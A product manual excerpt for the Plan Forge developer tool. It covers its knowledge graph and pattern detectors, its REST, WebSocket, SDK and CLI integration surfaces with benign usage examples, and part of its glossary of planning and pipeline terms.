A floating 3D constellation of glowing bronze nodes connected by amber light edges suspended in a stone forge chamber, with node clusters shaped like scrolls, hammers, vessels, and crossed wrenches representing Phase, Slice, Bug, and Commit nodes

Chapter 28 · Act V, Integrate

The Knowledge Graph

Plan Forge writes structured events on every action: slice starts, gate failures, commits, bug filings, cost samples. The knowledge graph stitches those events into a queryable graph, then runs four pattern detectors and a daily digest aggregator across it. The result: you find recurring failures before the failures find you.

Three components. forge_graph_query introduced the graph itself; forge_patterns_list added the four detectors; pforge digest ships the daily roll-up that surfaces the most actionable findings into the dashboard's Yesterday's Digest tile.

Why a graph?

Every Plan Forge subsystem already writes its own structured log: .forge/runs/*.jsonl, .forge/trajectories/*.jsonl, .forge/bugs/*.json, .forge/cost/*.json, .forge/team-activity.jsonl. Individually, each file answers one question, such as "what did this run cost?" or "what bugs are open?". The interesting questions are cross-file:

"Which file gets touched most often by failing slices?"
"Which model has the highest failure rate on slices in the integration domain?"
"Has slice 4 of any plan ever shipped on the first try?"
"How does this week's cost-per-slice compare to last month's median?"

Answering any of these requires joining at least three logs. The knowledge graph builds an in-memory representation of those joins so the answer is a millisecond traversal, not a five-file grep.
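To show what "join once, then traverse" means in practice, here is a minimal sketch that joins two simplified logs and answers the first question in the list. The record shapes, the sample data, and the `buildGraph` / `hotFiles` helpers are all hypothetical; the real logs carry more fields and the real graph has more node and edge types.

```javascript
// HYPOTHETICAL, simplified log records invented for this example.
const sliceRuns = [
  { slice: "Phase-31:2", status: "failed" },
  { slice: "Phase-31:3", status: "passed" },
  { slice: "Phase-32:1", status: "failed" },
];
const sliceCommits = [
  { slice: "Phase-31:2", files: ["src/orders/repository.ts", "src/orders/service.ts"] },
  { slice: "Phase-31:3", files: ["src/orders/service.ts"] },
  { slice: "Phase-32:1", files: ["src/orders/repository.ts"] },
];

// Build slice -> file edges and slice -> status lookups once.
function buildGraph(runs, commits) {
  const touched = new Map();
  for (const c of commits) {
    if (!touched.has(c.slice)) touched.set(c.slice, new Set());
    for (const f of c.files) touched.get(c.slice).add(f);
  }
  const status = new Map(runs.map((r) => [r.slice, r.status]));
  return { touched, status };
}

// "Which file gets touched most often by failing slices?"
function hotFiles(graph) {
  const counts = new Map();
  for (const [slice, files] of graph.touched) {
    if (graph.status.get(slice) !== "failed") continue;
    for (const f of files) counts.set(f, (counts.get(f) ?? 0) + 1);
  }
  return [...counts.entries()].sort((a, b) => b[1] - a[1]);
}

console.log(hotFiles(buildGraph(sliceRuns, sliceCommits)));
// [ [ 'src/orders/repository.ts', 2 ], [ 'src/orders/service.ts', 1 ] ]
```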

The node + edge model

Figure 28-1. Knowledge graph schema, seven node types, four edge classes. Top tier (PLANNING HIERARCHY): one Phase node connects via 'contains' edges to three Slice nodes (31-1, 31-2, 31-3). Bottom tier (EXECUTION ARTIFACTS): five rectangular nodes: Run (cost, tokens, model), Commit (sha, author), File (path, churn), Bug (id, status), Incident (severity, mttr). Slices connect down via four edge classes: solid gray for 'executed_by' and 'produced', amber for 'touched' (slice to file), pink for 'found' (slice to bug, bug to incident), and dashed green for 'fixed_by' (bug back to commit). The right panel lists the queries this schema unlocks: pattern detectors, churn-vs-cost, bug-to-file blast radius, phase-to-fix-time, pforge digest, forge_patterns_list, forge_hotspot, forge_graph_query.

Seven node types: Phase, Slice, Commit, File, Run, Bug, CostSample. Six edge types. The whole graph for a year of plans on a medium-sized repo fits in <30 MB of memory and serializes to .forge/graph/snapshot.json in under a second.

The graph is derived, not authoritative. If snapshot.json is deleted, pforge graph rebuild recomputes it from the underlying logs. The logs are the source of truth; the graph is the index.

`forge_graph_query` — the query surface

Queries take a starting node selector and a traversal expression. The tool is intentionally not a general-purpose graph query language; it ships with a small, opinionated set of canned queries that answer the questions teams actually ask:

forge_graph_query({ query: "hot-files", windowDays: 30 })
// → files touched by the most failed slices in the last 30 days

forge_graph_query({ query: "bug-clusters", windowDays: 90 })
// → bugs grouped by shared file/symbol

forge_graph_query({ query: "model-leaderboard", domain: "integration" })
// → success rate per model on slices tagged with the integration domain

forge_graph_query({ query: "slice-history", slice: "4", windowDays: 180 })
// → every Phase that had a slice 4, with success/cost/duration

forge_graph_query({ query: "phase-roi", phase: "Phase-31" })
// → cost, duration, file churn, bugs raised, bugs closed for one phase

Custom traversals are also accepted via the lower-level traverse form (advanced):

forge_graph_query({
  start:   { type: "File", path: "src/orders/repository.ts" },
  follow:  ["touches<-Commit", "produced<-Slice", "raised->Bug"],
  filter:  { "Bug.status": "open" },
  return:  ["Bug.id", "Bug.title", "Slice.id", "Phase.id"],
  limit:   25
})

`forge_patterns_list` — the four detectors

forge_patterns_list runs four detector heuristics across the graph and returns ranked findings. Each detector is implemented as a deterministic graph traversal: no ML, no embeddings, just structural pattern matching.

Detector	Looks for	Signal
`gate-failure-recurrence`	Same gate failing across ≥3 slices in different plans within 30 days	"The validation is broken, not the code"
`model-failure-rate-by-complexity`	Models whose failure rate climbs steeply with slice complexity	"Use a flagship model for the hard slices, fast model for the easy ones"
`slice-flap-pattern`	Slices that succeed-then-fail-then-succeed on retry (non-monotonic outcomes)	"Flaky gate or non-deterministic test in this slice"
`cost-anomaly`	Runs whose cost-per-slice exceeds the 90-day median by ≥2.5×	"Token blow-up, investigate retry logic or context bloat"
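
As an illustration of how simple these heuristics can be, the cost-anomaly rule in the table reduces to a median and a threshold. The sketch below assumes the input has already been limited to the 90-day window and that each run carries a `costPerSliceUsd` field; both the field name and the `findCostAnomalies` helper are hypothetical.

```javascript
// Median of a numeric list (does not mutate the input).
function median(values) {
  const sorted = [...values].sort((a, b) => a - b);
  const mid = Math.floor(sorted.length / 2);
  return sorted.length % 2 === 1 ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2;
}

// Flag runs whose cost per slice is at least `factor` times the median.
// `runs` is assumed to be pre-filtered to the 90-day window.
function findCostAnomalies(runs, factor = 2.5) {
  if (runs.length === 0) return [];
  const baseline = median(runs.map((r) => r.costPerSliceUsd));
  if (baseline <= 0) return []; // no meaningful baseline to compare against
  return runs
    .filter((r) => r.costPerSliceUsd >= baseline * factor)
    .map((r) => ({
      id: r.id,
      medianUsd: baseline,
      observedUsd: r.costPerSliceUsd,
      ratio: r.costPerSliceUsd / baseline,
    }));
}

const runs = [
  { id: "Phase-27", costPerSliceUsd: 0.40 },
  { id: "Phase-28", costPerSliceUsd: 0.42 },
  { id: "Phase-29", costPerSliceUsd: 0.44 },
  { id: "Phase-30", costPerSliceUsd: 0.41 },
  { id: "Phase-31", costPerSliceUsd: 1.31 },
];
const anomalies = findCostAnomalies(runs);
console.log(anomalies);
```

With these sample numbers only Phase-31 is flagged, at roughly 3.1× the 0.42 median.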

Response shape

forge_patterns_list({ windowDays: 30, limit: 10 })

// Response:
{
  generatedAt: "2026-05-17T14:00:00Z",
  windowDays: 30,
  patterns: [
    {
      detector: "gate-failure-recurrence",
      severity: "high",
      title:    "Gate 'tsc --noEmit' failed in 5 slices across 3 plans",
      evidence: { slices: ["Phase-29:3", "Phase-30:1", "Phase-30:4", "Phase-31:2", "Phase-31:5"], commonError: "TS2307: Cannot find module ..." },
      suggestedAction: "Investigate tsconfig path mapping; consider widening gate or fixing build config."
    },
    {
      detector: "cost-anomaly",
      severity: "medium",
      title:    "Phase-31 cost/slice 3.1× over 90-day median",
      evidence: { phase: "Phase-31", medianUsd: 0.42, observedUsd: 1.31, primarySuspect: "long-context-retries" }
    }
    // ...
  ],
  total: 7
}

The Recurring Patterns dashboard panel is a thin renderer over this tool's output, sorted by severity descending. Each finding has a "Suppress for 7 days" button (the suppression list lives in .forge/patterns-suppressions.json, see Conventions for the format).
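
A renderer like the one described above needs only two steps: drop findings with an unexpired suppression, then sort by severity. The following is a rough sketch under assumptions: the suppression entry shape (`detector`, `title`, `expiresAt`) is invented for illustration (the real format is documented in Conventions), and the `low` severity level is assumed alongside the `high` and `medium` values shown in the response.

```javascript
const SEVERITY_RANK = { high: 3, medium: 2, low: 1 }; // "low" is an assumed level
const DAY_MS = 24 * 60 * 60 * 1000;

// Build a hypothetical suppression entry that expires after `days`.
function suppressForDays(finding, days, now = Date.now()) {
  return {
    detector: finding.detector,
    title: finding.title,
    expiresAt: new Date(now + days * DAY_MS).toISOString(),
  };
}

// Hide findings with an unexpired suppression, then sort by severity descending.
function visibleFindings(patterns, suppressions, now = Date.now()) {
  const active = suppressions.filter((s) => Date.parse(s.expiresAt) > now);
  const isSuppressed = (p) =>
    active.some((s) => s.detector === p.detector && s.title === p.title);
  return patterns
    .filter((p) => !isSuppressed(p))
    .sort((a, b) => (SEVERITY_RANK[b.severity] ?? 0) - (SEVERITY_RANK[a.severity] ?? 0));
}

const at = Date.parse("2026-05-17T14:00:00Z");
const findings = [
  { detector: "cost-anomaly", severity: "medium", title: "A" },
  { detector: "gate-failure-recurrence", severity: "high", title: "B" },
  { detector: "slice-flap-pattern", severity: "medium", title: "C" },
];
const suppressionList = [
  suppressForDays(findings[2], 7, at), // active: hides finding C
  { detector: "gate-failure-recurrence", title: "B", expiresAt: "2026-05-01T00:00:00Z" }, // expired
];
const shown = visibleFindings(findings, suppressionList, at);
console.log(shown.map((f) => f.title));
```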

`pforge digest` — Yesterday's Digest

The graph and the detectors give you raw findings. pforge digest compresses them into a single human-readable summary intended to be the first thing you read each morning.

pforge digest
pforge digest --since=24h         # default
pforge digest --since=7d          # weekly roll-up
pforge digest --format=json       # machine-readable
pforge digest --post              # post to configured notification channel

A typical digest collects six categories of finding:

Plans shipped: count, total cost, success-rate-on-first-try
Aging meta-bugs: open self-repair issues older than 14 days
Stalled phases: plans started but no slice committed in 48 hours
Probe-lane deltas: model availability changes since yesterday (from forge_doctor_quorum)
Drift score changes: environment/config drift exceeding threshold (from forge_drift_report)
Cost anomalies: the top finding from the cost-anomaly detector

The Yesterday's Digest dashboard tile is the same content, rendered in HTML. The CLI form is useful in a daily Slack post or as the body of a forge_notify_send message.

Wire it into cron / GitHub Actions: pforge digest --post at 09:00 every weekday with a Slack notifier configured (notify-slack extension) gives a free daily standup grounded in actual run data, not vibes.

Where the data lives

Path	Purpose	Rebuildable
`.forge/graph/snapshot.json`	Serialized graph index	Yes, `pforge graph rebuild`
`.forge/patterns-suppressions.json`	User-suppressed pattern findings + expiry	No (state)
`.forge/digests/YYYY-MM-DD.json`	Cached daily digest output	Yes, `pforge digest --rebuild`
`.forge/runs/`, `.forge/trajectories/`, `.forge/bugs/`, `.forge/cost/`	Source logs (graph is derived from these)	Authoritative

CLI summary

pforge graph stats               # node/edge counts, last-rebuild timestamp
pforge graph rebuild             # full rebuild from logs
pforge graph query hot-files     # run a canned query
pforge patterns                  # list current findings from all four detectors
pforge patterns --since=7d
pforge digest                    # the morning summary
pforge digest --post             # send via configured notifier

See also: Chapter 22 — How the Shop Remembers for the L1/L2/L3 memory tiers the graph draws from. Chapter 27 — Team Coordination for the activity ledger that feeds the Phase/Slice/Run nodes. Chapter 25 — Health DNA for trend metrics that complement pattern findings.


Chapter 29 · Act V, Integrate

Integrating from Outside

MCP is the native transport for Copilot and similar agents, but it is not the only one. Plan Forge also ships REST for HTTP-anything, an SDK for Node.js callers, a WebSocket hub for live event streams, and a CLI for scripts and humans, so any tool can drive the workshop.

The big numbers. The integration surface is large by design: 102 MCP tools, 103 REST endpoints across 17+ domains, a 4-sub-path SDK (pforge-sdk, /tools, /hallmark, /chunker), and 97 CLI commands. The same underlying handlers back every surface, so pick the one that fits the caller, not the feature.

The four surfaces, at a glance

Left-to-right integration surface map. Three clustered columns: Callers (Copilot/Agents, CI runners, Custom dashboards, Scripts/Humans), Surfaces (MCP Server over stdio plus websocket, REST API over HTTP/JSON, WebSocket Hub at /api/hub, CLI pforge), and Plan Forge Core (Tool handlers). Copilot routes through MCP to handlers, CI routes through REST to handlers, dashboards route through both REST and the WebSocket Hub to handlers, and scripts and humans route through the CLI to handlers, all four surfaces converging on the same shared handler set. — Figure 29-1. Integration surface map, MCP, REST, WebSocket Hub, and CLI all route to the same handlers.

The same handler set lives behind all four surfaces. Adding a new tool means the team writes one handler, and it automatically becomes available as MCP tool, REST endpoint, CLI command, and SDK export. This is intentional: the integration surface should never be the bottleneck for a new capability.
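
The "one handler, many surfaces" idea can be sketched as a small registry in which each surface resolves its own identifier to the same function. This is an illustration of the pattern, not the Plan Forge source: `registerHandler`, `dispatch`, the `plan.status` key, and the `forgePlanStatus` SDK name are all hypothetical, and the handler body is a stub.

```javascript
// One handler definition, reachable through several surface-specific names.
const handlers = new Map();

function registerHandler(def) {
  handlers.set(def.name, def);
}

registerHandler({
  name: "plan.status",
  surfaces: {
    mcp: "forge_plan_status",
    rest: "GET /api/plan/status",
    cli: "plan-status",
    sdk: "forgePlanStatus", // assumed export name
  },
  // Stub logic standing in for the real handler.
  run: (args) => ({ plan: args.plan, state: "running" }),
});

// Each surface adapter only translates its identifier; the logic is shared.
function dispatch(surface, identifier, args) {
  for (const def of handlers.values()) {
    if (def.surfaces[surface] === identifier) return def.run(args);
  }
  throw new Error(`No handler for ${surface}:${identifier}`);
}

console.log(dispatch("mcp", "forge_plan_status", { plan: "Phase-31" }));
console.log(dispatch("cli", "plan-status", { plan: "Phase-31" }));
```

Because the adapters carry no logic of their own, every surface returns the same result for the same arguments.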

Figure 29-2. Surface decision tree: pick by caller, not by capability

REST API

The REST surface is the right choice for any caller that already speaks HTTP: GitHub Actions, GitLab CI, a Python script, a curl one-liner, a Postman collection. It is also the surface the dashboard itself uses.

Base URL and auth

# Local dev (default)
http://localhost:3100/api

# Auth: bearer token from .forge/secrets.json (key: "apiToken")
curl -H "Authorization: Bearer $PFORGE_API_TOKEN" \
     http://localhost:3100/api/plan/status

Tokens are generated by pforge auth issue and stored locally in .forge/secrets.json (gitignored). Multi-developer setups use one token per developer; CI uses a dedicated CI token with scoped permissions.

The 17+ domains

The endpoints organize into 17+ domains that mirror the MCP tool families. The full per-endpoint reference lives in Appendix W (REST API Reference); this chapter covers the shape:

Prefix	Backs	Sample endpoint
`/api/plan`	Plan execution + status	`POST /api/plan/run`
`/api/cost`	Cost reports + estimates	`GET /api/cost/report`
`/api/team`	Team dashboard + activity	`GET /api/team/dashboard`
`/api/copilot-instructions`	Copilot trilogy	`POST /api/copilot-instructions/sync`
`/api/graph`	Knowledge graph queries	`POST /api/graph/query`
`/api/liveguard`	Deploy safety surface	`POST /api/liveguard/run`
`/api/bugs`	Bug registry	`GET /api/bugs`
`/api/crucible`	Idea smelting	`POST /api/crucible/ask`
`/api/forge-master`	Read-only reasoning agent	`POST /api/forge-master/ask`
`/api/hub`	WebSocket event stream (see next section)	`WS /api/hub`

Every endpoint returns RFC 7807 ProblemDetails on error and a structured JSON object on success. The OpenAPI spec lives at GET /api/openapi.json if you need codegen.
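
Callers can turn that error contract into a typed exception with very little code. The sketch below uses the standard RFC 7807 members (`type`, `title`, `status`, `detail`, `instance`); it assumes error responses carry the standard `application/problem+json` media type, which this chapter does not state explicitly. `ForgeApiError` and `unwrapResponse` are hypothetical names.

```javascript
// Error type carrying the RFC 7807 problem members.
class ForgeApiError extends Error {
  constructor(problem, httpStatus) {
    super(problem.detail || problem.title || `HTTP ${httpStatus}`);
    this.name = "ForgeApiError";
    this.status = problem.status ?? httpStatus;
    this.type = problem.type ?? "about:blank"; // RFC 7807 default when absent
    this.title = problem.title;
    this.instance = problem.instance;
  }
}

// Return the parsed body on 2xx; otherwise throw a ForgeApiError.
function unwrapResponse(httpStatus, contentType, bodyText) {
  const ok = httpStatus >= 200 && httpStatus < 300;
  if (ok) return bodyText ? JSON.parse(bodyText) : null;
  const isProblem = (contentType || "").startsWith("application/problem+json");
  let problem = {};
  if (isProblem) {
    try {
      problem = JSON.parse(bodyText);
    } catch {
      // Malformed body: fall back to a status-only error.
    }
  }
  throw new ForgeApiError(problem, httpStatus);
}

// With fetch (Node 18+), the call site would look roughly like:
//   const res = await fetch(url, options);
//   const data = unwrapResponse(res.status, res.headers.get("content-type"), await res.text());
try {
  unwrapResponse(
    404,
    "application/problem+json",
    JSON.stringify({ title: "Not Found", status: 404, detail: "No such plan" })
  );
} catch (err) {
  console.log(err.name, err.status, err.message);
}
```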

WebSocket hub — `/api/hub`

The WebSocket hub is a broadcast channel that emits every event the orchestrator generates: plan starts, slice transitions, gate results, cost samples, bug filings, drift updates. It is the substrate the dashboard's live tiles render from.

Connecting

// Node.js
import { WebSocket } from "ws";
const ws = new WebSocket("ws://localhost:3100/api/hub", {
  headers: { Authorization: `Bearer ${process.env.PFORGE_API_TOKEN}` }
});

ws.on("message", (raw) => {
  const event = JSON.parse(raw.toString());
  console.log(event.type, event.payload);
});

Event shape

{
  "type":    "slice.commit",       // canonical event name
  "ts":      "2026-05-17T09:18:41Z",
  "actor":   "alice@example.com",
  "plan":    "Phase-31",
  "slice":   "2",
  "payload": { "sha": "e4f5g6h", "durationMs": 24100, "gates": ["pass", "pass"] }
}

The full event catalog, 38 event types across eight families with envelope, source/security_risk enums, payloads, and retention, lives in Appendix V — Event Catalog. The canonical JSON schema lives in pforge-mcp/EVENTS.md. Subscribe to all events or filter by type:

ws.send(JSON.stringify({
  subscribe: ["slice.*", "gate.fail", "bug.opened"]
}));
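
If a client also wants to route events locally, the same pattern syntax can be matched in a few lines. This sketch assumes a trailing `.*` matches any event within that family and that anything else must match exactly; the hub's actual wildcard semantics are not spelled out here, so treat `matchesSubscription` as a hypothetical client-side helper.

```javascript
// Return true if eventType matches any pattern in the list.
function matchesSubscription(eventType, patterns) {
  return patterns.some((pattern) => {
    if (pattern === "*") return true;
    if (pattern.endsWith(".*")) {
      // "slice.*" keeps the trailing dot, so it matches "slice.commit"
      // but not "slices.commit" or the bare family name "slice".
      return eventType.startsWith(pattern.slice(0, -1));
    }
    return eventType === pattern;
  });
}

const subscribed = ["slice.*", "gate.fail", "bug.opened"];
for (const type of ["slice.commit", "gate.fail", "plan.complete"]) {
  console.log(type, matchesSubscription(type, subscribed));
}
```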

Custom dashboards: the entire /dashboard route is built on top of this WebSocket. If you want to embed Plan Forge progress into your own ops portal, point a WebSocket client at /api/hub, filter to the event types you care about, and render. Zero polling.

`pforge-sdk` — the Node.js client

For TypeScript / JavaScript callers, pforge-sdk is a thin wrapper over the REST and WebSocket surfaces with typed responses and bundled helpers. It ships with four entry points:

Import	Contains
`pforge-sdk`	Core client: `createClient({ baseUrl, token })`, all REST methods, WebSocket subscriber
`pforge-sdk/tools`	Typed wrappers for every MCP tool; call any `forge_*` tool from Node.js
`pforge-sdk/hallmark`	Hallmark stamp helpers: sign / verify generated artifacts
`pforge-sdk/chunker`	Plan chunker: splits long plans into Scope-Contract-aligned slices for execution

Worked example

import { createClient } from "pforge-sdk";
import { forgeRunPlan, forgeEstimateQuorum } from "pforge-sdk/tools";

const client = createClient({
  baseUrl: "http://localhost:3100",
  token:   process.env.PFORGE_API_TOKEN
});

// Estimate before running (cost discipline, never hand-compute)
const est = await forgeEstimateQuorum(client, { plan: "docs/plans/Phase-31-PLAN.md" });
console.log("Cheapest mode:", est.recommendation);

// Execute
const run = await forgeRunPlan(client, {
  plan:   "docs/plans/Phase-31-PLAN.md",
  quorum: est.recommendation
});

// Subscribe to live events for this run
const sub = client.subscribe(["slice.*", "gate.*", "plan.complete"]);
for await (const event of sub) {
  if (event.plan !== "Phase-31") continue;
  console.log(event.type, event.payload);
  if (event.type === "plan.complete") break;
}

CLI — for scripts and humans

The CLI is the right surface for ad-hoc scripts, cron jobs, and direct human use. Every command has a --json flag for machine-readable output, so it composes cleanly with shell pipelines and CI scripts.

# Run a plan and pipe the result into jq
pforge run-plan docs/plans/Phase-31-PLAN.md --json | jq '.cost.totalUsd'

# Loop until a plan completes (useful in CI)
while [ "$(pforge plan-status --json | jq -r '.state')" != "complete" ]; do
  sleep 30
done

# Daily digest into Slack
pforge digest --post

# Cost rollup for the month
pforge cost-report --since=30d --json | jq '.byModel'

The full 97-command reference lives in Chapter 8 — CLI Reference. The pforge --help output is the canonical source.
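
The shell loop above waits forever if a plan never reaches `complete`. In a Node.js script, the same wait can be bounded with a timeout. The sketch below is an assumption-laden illustration: `waitForPlan` is a hypothetical helper, the `running` and `failed` state names are guesses (only `complete` appears in this chapter), and the status source is injected so that a real caller could wrap `pforge plan-status --json` or the REST endpoint.

```javascript
// Poll a status source until it reports a terminal state or the timeout expires.
async function waitForPlan(
  getState,
  {
    intervalMs = 30000,
    timeoutMs = 60 * 60 * 1000,
    sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms)),
  } = {}
) {
  const terminal = new Set(["complete", "failed"]); // "failed" is an assumed state name
  const deadline = Date.now() + timeoutMs;
  while (true) {
    const state = await getState();
    if (terminal.has(state)) return state;
    if (Date.now() >= deadline) {
      throw new Error(`Timed out waiting for plan (last state: ${state})`);
    }
    await sleep(intervalMs);
  }
}

// Demo with a stubbed status source and a no-op sleep.
const demoStates = ["running", "running", "complete"]; // "running" is an assumed state name
waitForPlan(async () => demoStates.shift(), { sleep: async () => {} })
  .then((finalState) => console.log("final state:", finalState));
```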

Picking the right surface

Caller	Use	Why
GitHub Copilot / Claude / Cursor / Codex	MCP	Native transport; auto-discovered tools
GitHub Actions / GitLab CI / Jenkins	REST + CLI	Already speak HTTP and shell; no MCP transport in CI
Custom dashboard / status page	REST (initial) + WebSocket (live)	Snapshot on load, live updates after
Node.js script / automation	SDK	Typed responses; no transport boilerplate
cron job / one-shot batch	CLI	`--json` pipes cleanly; no long-running process
Mobile / web app / Slack bot	REST + WebSocket	Cross-platform; no Node.js requirement

Auth and secrets

All four surfaces share the same auth model:

Bearer tokens in the Authorization header (REST + WebSocket) or as PFORGE_API_TOKEN env var (CLI + SDK).
Tokens are issued via pforge auth issue [--scope=…] and stored in .forge/secrets.json (gitignored).
The MCP surface authenticates via the transport itself: stdio inherits the parent process trust; WebSocket MCP uses the same bearer token model.
Outbound API keys (Anthropic, OpenAI, xAI, Azure) live in .forge/secrets.json under providers.* or in environment variables. Never in code, never in committed config.

See also: Chapter 8 — CLI Reference for the full command catalog. Appendix W — REST API Reference for endpoint-by-endpoint REST docs. pforge-sdk/README.md for SDK reference. Chapter 7 — The Dashboard for the canonical example of a custom UI built on REST + WebSocket.


Appendix A

Glossary

Every Plan Forge term defined.

Auto-generated from capabilities.mjs glossary, hand-edited for clarity.

Getting Started: Read These Five First

If you're new to Plan Forge, these five terms cover 80% of the manual. They build on each other in this order:

Plan Forge: the whole shop. A workshop with four stations (Smelt, Forge, Guard, Learn) that take an idea from "vague feature request" all the way to "shipped, monitored, and remembered."
Plan: a Markdown file in docs/plans/ that describes one feature. The unit of work Plan Forge operates on.
Scope contract: the section of the plan that says exactly which files are in-scope, out-of-scope, and forbidden. Without this, AI agents drift into unrelated code.
Slice: one numbered step inside a plan. Plans are broken into 3–7 slices so the AI works in checkpointed chunks. Each slice ends at a validation gate.
Validation gate: a concrete shell command (e.g., dotnet test) that must pass before the next slice runs. Gates are how Plan Forge knows the AI didn't break anything.

Read those five and you can follow the rest of the manual without backtracking. The full reference begins below, organized by topic.

Core Concepts

Term	Definition
Plan Forge	The AI-Native SDLC Forge Shop. One workshop with four stations (Smelt, Forge, Guard, Learn) connected by gates, telemetry, and persistent memory. Covers every phase of the software lifecycle.
Forge	Shorthand for Plan Forge. Also: `.forge/` directory (project data), `.forge.json` (config).
Plan	A Markdown file in `docs/plans/` describing a feature. Contains slices, scope contract, and gates.
Hardened Plan	A plan that has passed Step 2: a locked-down execution contract with scope, slices, gates, and forbidden actions.
Scope Contract	Plan section defining In Scope, Out of Scope, and Forbidden files. Prevents scope creep.
Slice	A 30–120 minute unit of execution within a plan. Has tasks, a validation gate, and optional dependencies. Commit-sized: small enough to catch failures early, large enough to be useful.
Validation Gate	Build + test commands that must pass at every slice boundary before proceeding.
Forbidden Actions	Files or operations the AI must not touch. Enforced by lifecycle hooks and scope checks.
Stop Condition	A condition that halts execution, e.g., "If migration fails, STOP."
Guardrails	Instruction files that auto-load based on the file being edited. 15–18 per preset.
Preset	Stack-specific configuration (dotnet, typescript, python, etc.). Determines which files are installed.
Extension	Community add-on providing instructions, agents, or prompts for a specific domain.
Self-Deterministic Agent Loop	The v2.58 system-wide model: the deterministic slice executor plus ten opt-in inner-loop subsystems (reflexion, trajectories, auto-skills, gate synthesis, postmortems, federation, reviewer, competitive execution, auto-fix, cost-anomaly). Execution stays reproducible; loop context improves each pass. See the canonical overview.
Phase	Versioned chunk of Plan Forge development. Plans live at `docs/plans/Phase-N-PLAN.md`. A phase contains 1+ plans; each plan contains 1+ slices. Numbering is monotonic across the project (Phase-28.2, Phase-31, etc.).
Tempering	Post-execution coverage & quality subsystem. Scans the diff with pluggable scanners (typecheck, lint, content-audit, secret-scan), classifies findings into real-bug / flaky / noise lanes, and feeds the Bug Registry. Distinct from LiveGuard (runtime defense) and the Reviewer Gate (architectural review). 5 MCP tools: `forge_tempering_run/scan/status/drain/approve_baseline`.
Skill	A multi-step procedure invoked from chat via a `/slash-command` (e.g. `/code-review`, `/staging-deploy`, `/health-check`). Defined as `SKILL.md` files under `.github/skills/`. Runs through `forge_run_skill` with its own validation gates.
Project Principles	Project-level guardrails generated by `.github/prompts/project-principles.prompt.md` and stored in `docs/plans/PROJECT-PRINCIPLES.md`. Auto-load via `project-principles.instructions.md` when the file exists. Define forbidden patterns, technology commitments, and architectural boundaries.
AI Plan Hardening Runbook	The canonical 7-step pipeline every plan flows through (Specify → Preflight → Harden → Execute → Sweep → Review → Ship). Master copy: `docs/plans/AI-Plan-Hardening-Runbook.md`.

The Four Stations

The Forge Shop's organizing taxonomy: every Plan Forge feature lives at one of these four stations.

Term	Definition
Forge Shop	The whole workshop. The collective name for the four stations and the connective tissue (gates, telemetry, memory) that ties them together.
Station	One of the four phase-specific zones in the Forge Shop. Each station has its own tools, agents, artifacts, and gate to the next station.
Act	The Manual's organizational unit. Each Act covers one station's chapters. Act I = Smelt (Ch 1–5), Act II = Forge (Ch 6–15), Act III = Guard (Ch 16–20), Act IV = Learn (Ch 21–24).
🪨 Smelt	Station 1: Intake → Scope Contract. Where rough ideas become hardened plans the Forge can execute. Houses the Specifier agent, the AI Plan Hardening Runbook, the Crucible, and Project Principles.
🔨 Forge (station)	Station 2: Scope Contract → shipped code. Where slices are struck against the anvil. Houses `pforge run-plan`, slice gates, quorum mode, auto-escalation, and the cost ledger.
🛡️ Guard	Station 3: post-deploy defense. The watchtower. Houses LiveGuard (secret scan, drift, regression guard, env diff, incident capture), the Watcher, and the Remote Bridge.
🧠 Learn	Station 4: memory and retrospectives. The brain above the bench. Houses OpenBrain, the Bug Registry, the Testbed, Health DNA, and Forge Intelligence.
Watcher	Tool (`forge_watch`, `forge_watch_live`) that tails another project's `pforge run` from a separate VS Code session. Read-only by contract: it cannot modify the target.
Remote Bridge	Notification dispatcher that forwards hub events to Telegram, Slack, Discord, OpenClaw, or a generic webhook. Used for phone-friendly progress updates and approval prompts.
Bug Registry	Closed-loop scanner-bug tracker. Four tools: `forge_bug_register`, `forge_bug_list`, `forge_bug_update_status`, `forge_bug_validate_fix`. Records live in `.forge/bugs/<bugId>.json`.
Bug Fingerprint	Hash of scanner name + test name + assertion message + normalized stack trace. Re-registering a duplicate fingerprint returns `DUPLICATE_BUG` with the existing `bugId`.
Bug Status	State machine: `open → in-fix → validating → fixed`, with side branches to `wont-fix`, `duplicate`, and `noise`. Illegal transitions return `INVALID_TRANSITION`.
Bug Classifier	Heuristic that labels evidence as `real-bug` (persisted), `flaky` (ignored), or `noise` (discarded). Only `real-bug` writes to `.forge/bugs/`.
Testbed	Tool (`forge_testbed_run`) that replays scenario fixtures against a dedicated repo. Scenarios in `docs/plans/testbed-scenarios/.json`; findings in `docs/plans/testbed-findings/.json`. Feeds the Bug Registry and Health DNA.
Crucible	Smelt-station idea funnel for community extensions. Lifecycle: Submitted → Crystallized → Tempered → Hardened. Stalled Crystallized ideas surface as Watcher anomalies.
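
The Bug Status entry above describes a small state machine, which can be sketched as a transition table. The main path (`open → in-fix → validating → fixed`) and the `INVALID_TRANSITION` code come from the glossary; which states the side branches may leave from is not specified, so this sketch assumes they branch only from `open`. `updateStatus` is a hypothetical helper, not the `forge_bug_update_status` implementation.

```javascript
// Allowed next states per current state.
// Assumption: wont-fix / duplicate / noise are reachable only from "open".
const TRANSITIONS = {
  "open":       ["in-fix", "wont-fix", "duplicate", "noise"],
  "in-fix":     ["validating"],
  "validating": ["fixed"],
  "fixed":      [],
  "wont-fix":   [],
  "duplicate":  [],
  "noise":      [],
};

// Return the updated bug, or an INVALID_TRANSITION result for illegal moves.
function updateStatus(bug, next) {
  const allowed = TRANSITIONS[bug.status] ?? [];
  if (!allowed.includes(next)) {
    return { ok: false, code: "INVALID_TRANSITION", from: bug.status, to: next };
  }
  return { ok: true, bug: { ...bug, status: next } };
}

const bug = { bugId: "bug-001", status: "open" }; // illustrative record
console.log(updateStatus(bug, "in-fix"));
console.log(updateStatus(bug, "fixed"));
```

The first call succeeds; the second skips two steps on the main path and returns `INVALID_TRANSITION`.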

Pipeline

Term	Definition
Pipeline	The 7-step process: Specify → Preflight → Harden → Execute → Sweep → Review → Ship.
Step 0 (Specify)	Define what and why: a structured specification with acceptance criteria.
Step 1 (Preflight)	Verifies prerequisites before plan execution: git clean, build green, environment vars set. Ships as a prompt (`.github/prompts/step1-preflight-check.prompt.md`), not a separate agent persona.
Step 2 (Harden)	Convert spec into binding execution contract with slices, gates, and scope.
Step 3 (Execute)	Build code slice-by-slice. Can be automated or manual.
Step 5 (Review Gate)	Independent audit session that checks for drift, scope violations, and quality.
Specifier	Step 0 agent persona that turns a one-line idea into a structured specification with acceptance criteria. Lives at `.github/agents/specifier.agent.md`.
